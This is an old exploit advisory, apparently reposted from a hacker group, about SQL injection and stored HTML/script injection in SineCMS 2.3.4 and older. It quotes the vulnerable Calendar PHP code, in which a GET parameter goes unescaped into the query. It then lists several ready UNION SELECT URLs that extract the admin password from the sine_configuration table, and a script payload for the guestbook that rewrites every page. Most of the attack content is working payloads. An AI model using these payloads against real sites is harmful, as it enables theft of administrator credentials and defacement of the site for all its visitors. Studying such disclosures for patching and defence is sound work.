SineCMS <= 2.3.4 Calendar SQL Injection 'n something else..

2007-12-06T00:00:00
ID SECURITYVULNS:DOC:18571
Type securityvulns
Reporter Securityvulns
Modified 2007-12-06T00:00:00

Description


_ _ ____ __
/ | _
|\_____ \ _____/ | / |/ | | |/ \ | | (__ </ \ \ ______ | \ \ | | | \ | |/ \ \| | // | || |
||| /\
| /__ /\_ >| |___|||
\/\______| \/ \/
---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org


SineCMS <= 2.3.4 Calendar SQL Injection 'n something else..


By KiNgOfThEwOrLd


Notes:

Only with magic_quotes_gpc -> Off

Corrupted file:

mods/Calendar/index.php

Corrupted code:

[...] function Evento ($sine){ if (!isset($_GET[id]) OR $_GET[id]=="") { header("Location: index.php"); } $query = "SELECT * FROM ".$sine[db][prefisso_tab]."calendario WHERE id='$_GET[id]'"; if ($_GET[id]){ $result = mysql_query($query, $sine[db][db]); $row = mysql_fetch_array($result); [...]


Exploit:

http://[target]/[sinecms_path]/mods.php?mods=Calendar&action=info&id='+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*

Something else..

There are a lots of useless sql injection in the admin panel, like...

http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Guestbook&action=modifica&id='+union+select+1,2,3,4,password,6+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&mese=11'+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&action=modify&id='+union+select+1,2,3,4,password,6,7,8,9+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&anno='+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*

and much more..

There is also a permanent html injection in the guestbook, and i belive it can be considered so dangerous, coz the "last comments" module it's included in all the pages...then, an attacker can rewrite alle the pages posting a comment like

<script>document.body.innerHTML="[Arbitrary_Code]";</script>

in the "username" or "comment" field.